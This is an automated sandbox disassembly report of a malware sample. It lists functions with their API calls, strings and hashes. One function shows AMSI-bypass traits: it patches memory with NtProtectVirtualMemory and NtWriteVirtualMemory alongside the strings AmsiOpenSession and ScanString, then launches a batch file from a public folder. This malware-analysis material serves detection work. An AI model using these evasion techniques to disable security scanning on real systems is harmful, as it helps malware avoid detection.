Part of subcall function 02A22740: CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A228C1

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,02A17598), ref: 02A1755F
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 02A17570

Strings

USER32, xrefs: 02A1755A
Delphi%.8X, xrefs: 02A17452
AnimateWindow, xrefs: 02A1756A
ControlOfs%.8X%.8X, xrefs: 02A174A3

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 1515865724-1126952177
Opcode ID: b984f1575fa13578ad6ac579cf2252d15a483a656911cd9822ef3ad346b5a5c4
Instruction ID: 2ef22c4a3f1860771deda62ebdc829c0c6597c938ee9f0ecd9e067a5be7cd5ef
Opcode Fuzzy Hash: b984f1575fa13578ad6ac579cf2252d15a483a656911cd9822ef3ad346b5a5c4
Instruction Fuzzy Hash: D8414778A402059FDB00FFB8E88499EB7FAFB88310B019825E405E7351DF34A916DF65

Uniqueness

Uniqueness Score: -1.00%

Function 02A2BCF8 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 400
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 029EFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD70
Part of subcall function 029EFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD7E
Part of subcall function 029EFD38: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029EFD97
Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB3
Part of subcall function 029EFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB9
Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE3
Part of subcall function 029EFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE9
Part of subcall function 029EFD38: FreeLibrary.KERNEL32(74AE0000,00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000), ref: 029EFDF4

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02B5EBB8,02B5EBFC,ScanString,02A6A350,02A2C330,OpenSession,02A6A350), ref: 02A2C05F
WaitForSingleObject.KERNEL32(0000087C,000000FF,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330,UacScan,02A6A350), ref: 02A2C2AB
CloseHandle.KERNEL32(0000087C,0000087C,000000FF,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330,UacScan), ref: 02A2C2B6
CloseHandle.KERNEL32(00000898,0000087C,0000087C,000000FF,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330), ref: 02A2C2C1

Strings

*"C:\Users\Public\Libraries\ClmgncrsO.bat" , xrefs: 02A2BE69, 02A2C029
Amsi, xrefs: 02A2BE9D
OpenSession, xrefs: 02A2BD8A, 02A2BF2E, 02A2C0DC, 02A2C1C8
UacScan, xrefs: 02A2BD31, 02A2BED5, 02A2C06B
AmsiOpenSession, xrefs: 02A2BE8C
ScanString, xrefs: 02A2BDE3, 02A2BF87, 02A2C14D, 02A2C239

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: HandleProcess$CloseCurrentLibraryMemoryVirtual$AddressCreateFreeLoadModuleObjectProcProtectSingleUserWaitWrite
String ID: *"C:\Users\Public\Libraries\ClmgncrsO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
API String ID: 2776809114-2399156540
Opcode ID: 747564a2852070f6c3abdab04cca6853c087b561dfebc98a8bcf4b84b4424c37
Instruction ID: b1c88d242fd92f86fb9ba9f7135b00cdef9c5b930a7f3169d16f58bb4328bebc
Opcode Fuzzy Hash: 747564a2852070f6c3abdab04cca6853c087b561dfebc98a8bcf4b84b4424c37
Instruction Fuzzy Hash: A8F13431A001289BDB11EBA8D980FDEB3BBBF94710F11D4A6E005AB254DF30EE459F95

Uniqueness

Uniqueness Score: -1.00%

Function 02A22740 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(00000000,MAINICON), ref: 02A22837
GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A22869
OemToCharA.USER32(?,?), ref: 02A2287C
CharNextA.USER32(?,00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A228BB
CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A228C1

Part of subcall function 02A22A94: GetClassInfoA.USER32(029D0000,02A22730,?), ref: 02A22AF3
Part of subcall function 02A22A94: RegisterClassA.USER32(02A3B650), ref: 02A22B0B
Part of subcall function 02A22A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 02A22BA7
Part of subcall function 02A22A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 02A22BC9

Strings

MAINICON, xrefs: 02A2282A

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
String ID: MAINICON
API String ID: 2763768735-2283262055
Opcode ID: 5416931c4b5ed986a302939eb5efcc94c033cd7508856cf3f806627396ad05ed
Instruction ID: 0ad577a8b6f8ec7563c0431e674981195ae82c64b49a9d3c016da8b9f8a7d24c
Opcode Fuzzy Hash: 5416931c4b5ed986a302939eb5efcc94c033cd7508856cf3f806627396ad05ed
Instruction Fuzzy Hash: 31517C70A442858FDB40EF68C8C4B857BE5AB59304F4485F9DC48DF246DBBAD888CF61

Uniqueness

Uniqueness Score: -1.00%

Function 029D17C0 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,029D209C), ref: 029D186C
Sleep.KERNEL32(0000000A,00000000,?,029D209C), ref: 029D1882

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0d987483abd115be2e09ec5d8ad907704f7f8f63b13a0729111fe2a3e9a7a5f6
Instruction ID: 7abad3e1e1de707bd9493e42cd75275fbf3b12a5622361facbe4b0f33a5074fa
Opcode Fuzzy Hash: 0d987483abd115be2e09ec5d8ad907704f7f8f63b13a0729111fe2a3e9a7a5f6
Instruction Fuzzy Hash: BCB13573A102118BCB15CF68E888365FBE1FB85359F18CAAED45D8B385DB70D852DB90

Uniqueness

Uniqueness Score: -1.00%

Function 029D1B28 Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,029D2080), ref: 029D1BB3
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,029D2080), ref: 029D1BCD

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7bbf17e82cd49d377d3b020eaa3d2fd02e377dfb3e1334304de9243c6eb282b0
Instruction ID: 7be907fbd1064f4b9f3190f111e79d0658fab37b058360b3d457411cb15e8841
Opcode Fuzzy Hash: 7bbf17e82cd49d377d3b020eaa3d2fd02e377dfb3e1334304de9243c6eb282b0
Instruction Fuzzy Hash: C551F5726103008FDB15CF78D984756BBD4EF85318F18C9AED448CB295E774C845EB91

Uniqueness

Uniqueness Score: -1.00%

Function 029F765C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 029F7682

Part of subcall function 029F7618: GetDC.USER32(00000000), ref: 029F7621
Part of subcall function 029F7618: SelectObject.GDI32(00000000,058A00B4), ref: 029F7633
Part of subcall function 029F7618: GetTextMetricsA.GDI32(00000000), ref: 029F763E
Part of subcall function 029F7618: ReleaseDC.USER32(00000000,00000000), ref: 029F764F

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 029F76D8
MS Shell Dlg 2, xrefs: 029F76EC
Tahoma, xrefs: 029F76A4

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: MetricsObjectReleaseSelectText
String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
API String ID: 2013942131-1011973972
Opcode ID: 227b4499ade374a60fc9c1f81deaa511f3e70a657f7574b37ce46e642e89d376
Instruction ID: 47b71f53b78aa3d8d9a0cc7c49e6f0e104a1b085e06a611a8a3e68ff231e221c
Opcode Fuzzy Hash: 227b4499ade374a60fc9c1f81deaa511f3e70a657f7574b37ce46e642e89d376
Instruction Fuzzy Hash: F011A330A50248AFEBC1EFA8D8419EDB7EAEB89700F6144A4E600D7655DB71AD11CF51

Uniqueness

Uniqueness Score: -1.00%

Function 029EEA38 Relevance: 6.1, APIs: 4, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoA.USER32(029D0000,029EEA28,?), ref: 029EEA59
UnregisterClassA.USER32(029EEA28,029D0000), ref: 029EEA82
RegisterClassA.USER32(02A3AAF8), ref: 029EEA8C
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 029EEAD7

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 057bff41aa2b369534d6daa27ed2a76ab912ffc40796134a3daeaf2ac1863816
Instruction ID: b5a8e30eac3a119649099324de380d058350fedb145cb1932468ad901cb1aec1
Opcode Fuzzy Hash: 057bff41aa2b369534d6daa27ed2a76ab912ffc40796134a3daeaf2ac1863816
Instruction Fuzzy Hash: 3E015E71A80105ABDB01EF98DC85FDB779EE749314F108915FA95E7281DB31D8528B60

Uniqueness

Uniqueness Score: -1.00%

Function 029F0308 Relevance: 4.6, APIs: 3, Instructions: 132registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,029F04A2), ref: 029F0374
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,029F04A2), ref: 029F03DF
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 029F0444

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b03f57cb1b808bc9ce44596d7b6e2b9e1bae5bf53a30de09f6548a63c2cfc652
Instruction ID: b17e9d0a397e9affe1b2a0a53a7b4f50b09b97bd0a029b4eccdc3776baec5076
Opcode Fuzzy Hash: b03f57cb1b808bc9ce44596d7b6e2b9e1bae5bf53a30de09f6548a63c2cfc652
Instruction Fuzzy Hash: A6417734B00308AFEB91EBA4D941BDEB7FEAF84304F108469E945A3296D7759F05AF50

Uniqueness

Uniqueness Score: -1.00%

Function 029E9CA0 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029E9DE8,?,?,029E5B68,00000001), ref: 029E9CFC
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029E9DE8,?,?,029E5B68,00000001), ref: 029E9D2A

Part of subcall function 029D8CE0: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,029E5B68,029E9D6A,00000000,029E9DE8,?,?,029E5B68), ref: 029D8D2E

Part of subcall function 029D8F1C: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,029E5B68,029E9D85,00000000,029E9DE8,?,?,029E5B68,00000001), ref: 029D8F3B

GetLastError.KERNEL32(00000000,029E9DE8,?,?,029E5B68,00000001), ref: 029E9D8F

Part of subcall function 029DB878: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,029DD5E5,00000000,029DD63F), ref: 029DB897

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 0e4dc661bdb872f36a3c704b439a910be805ad5b3a0cc404870e187e8354f042
Instruction ID: 3e21ea0d8afe40cbfbf2a4b2e9b8b4091d006904e2cdb6cd3fe233d4eef7f54d
Opcode Fuzzy Hash: 0e4dc661bdb872f36a3c704b439a910be805ad5b3a0cc404870e187e8354f042
Instruction Fuzzy Hash: 10318530E042189FEB01EFB8C881BEDB7F6AF88304F51C565E504A7380D77969458FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A2C788 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02B5ED0C), ref: 02A2C7CC
RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02A2C837), ref: 02A2C804
RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02A2C837), ref: 02A2C80F

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: da7301bb582ccf24034fb915af09bea54b7c0c36cdf825d21ccc9fe54b1c12f6
Instruction ID: d47dabde98f1f47306977abbec1a1b464dc89c57c901a3632332353f77982371
Opcode Fuzzy Hash: da7301bb582ccf24034fb915af09bea54b7c0c36cdf825d21ccc9fe54b1c12f6
Instruction Fuzzy Hash: 2E111C71640208AFEB01EFB8DD85A9E7BFDEB88750F519861F404DB250DB70EA41AE64

Uniqueness

Uniqueness Score: -1.00%

Function 029DF6D0 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 029DF6DF

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 2f3f4cae606554b410227460394ca4b655da39152e37378a6d2f11789e6c0fe4
Instruction ID: 31f55461ce324d11bec34f6a08cf6605e3908618cd628c5bfe320641bf6b2c43
Opcode Fuzzy Hash: 2f3f4cae606554b410227460394ca4b655da39152e37378a6d2f11789e6c0fe4
Instruction Fuzzy Hash: 35F0C27870011057DB256B389D866E923AE5F80740B50D865E4879BA11CB35CC0AF723

Uniqueness

Uniqueness Score: -1.00%

Function 029D5058 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02A2C89C), ref: 029D4F76
SysAllocStringLen.OLEAUT32(?,?), ref: 029D5063
SysFreeString.OLEAUT32(00000000), ref: 029D5075

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: f46f36ae17db063219812039f4efadb23abcdbc84c1bdec671a070b6a7e02eb9
Instruction ID: 4e65cfcb71bde1398be6929f1dbcd0013a32169b44441e63cde4c0e2d2ce7a39
Opcode Fuzzy Hash: f46f36ae17db063219812039f4efadb23abcdbc84c1bdec671a070b6a7e02eb9
Instruction Fuzzy Hash: 7EE012BD1052016DEF146F699800F37336EAFC1600F54D869E900CA174DB39C451BD34

Uniqueness

Uniqueness Score: -1.00%

Function 029EF2A8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 029EF5A6

Strings

H, xrefs: 029EF35D

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 727024f3881022be6ad7ba3def061559d294045672f85a500dce25885a3ac18a
Instruction ID: e460a5b0efef2bdc771368a53613a72375be08eaac9e8b80cc9c87260469fe79
Opcode Fuzzy Hash: 727024f3881022be6ad7ba3def061559d294045672f85a500dce25885a3ac18a
Instruction Fuzzy Hash: D9B1E475A01608DFDF11CF98D480AADBBF6FF89314F54856AE80AAB760E730A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 029F04C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,029F0524), ref: 029F04F2

Strings

MS Shell Dlg 2, xrefs: 029F04C1, 029F04C3

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: QueryValue
String ID: MS Shell Dlg 2
API String ID: 3660427363-3198668166
Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction ID: fea54eae9697dfb1f69205917b25eb0df1c69e9db11a054da251a526665e5ddc
Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction Fuzzy Hash: C3F030623091086BD704EAADAD40FAB7BDDDBC5351F01843ABA4CC7241DA21DC099B75

Uniqueness

Uniqueness Score: -1.00%

Function 029DFACC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 029DFAED

Part of subcall function 029DF6D0: VariantClear.OLEAUT32(?), ref: 029DF6DF

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 6e17dea342b6617f18e0a25f5716ea350908078cbf536f86e956753a412567a9
Instruction ID: b0bccaacb19a34e48423986f27ce888a192ca3c745d96c64574f547055a1d1fd
Opcode Fuzzy Hash: 6e17dea342b6617f18e0a25f5716ea350908078cbf536f86e956753a412567a9
Instruction Fuzzy Hash: BA1182347003109BCB20AF28C89696763EAEF85390715D86AE84F8FA15DB38CC41EA52

Uniqueness

Uniqueness Score: -1.00%

Function 029DF768 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 029DF7A8

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 8343ec323b34c7077e53f62499c9a035d61344d39b50939a136adfb896930792
Instruction ID: 1134addd4a687db57314c9de5b2c0af58e90c4819bbde55ef1e6cba92a72445b
Opcode Fuzzy Hash: 8343ec323b34c7077e53f62499c9a035d61344d39b50939a136adfb896930792
Instruction Fuzzy Hash: 34317072A00209AFDB10DFA8C886AEA77ECEB49304F54C562F907D3A50D730D991DB52

Uniqueness

Uniqueness Score: -1.00%

Function 029D738A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029D73CB

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction ID: 4573041073f9f83ddc65dd4b08b1ff516de02644485fed04ae3b366347bb97b2
Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction Fuzzy Hash: 9CF07AB2700118BF9B80DE9DDC80EDBB7EDEB8C2A4B058165BA08D7200D630ED109BB4

Uniqueness

Uniqueness Score: -1.00%

Function 029D738C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029D73CB

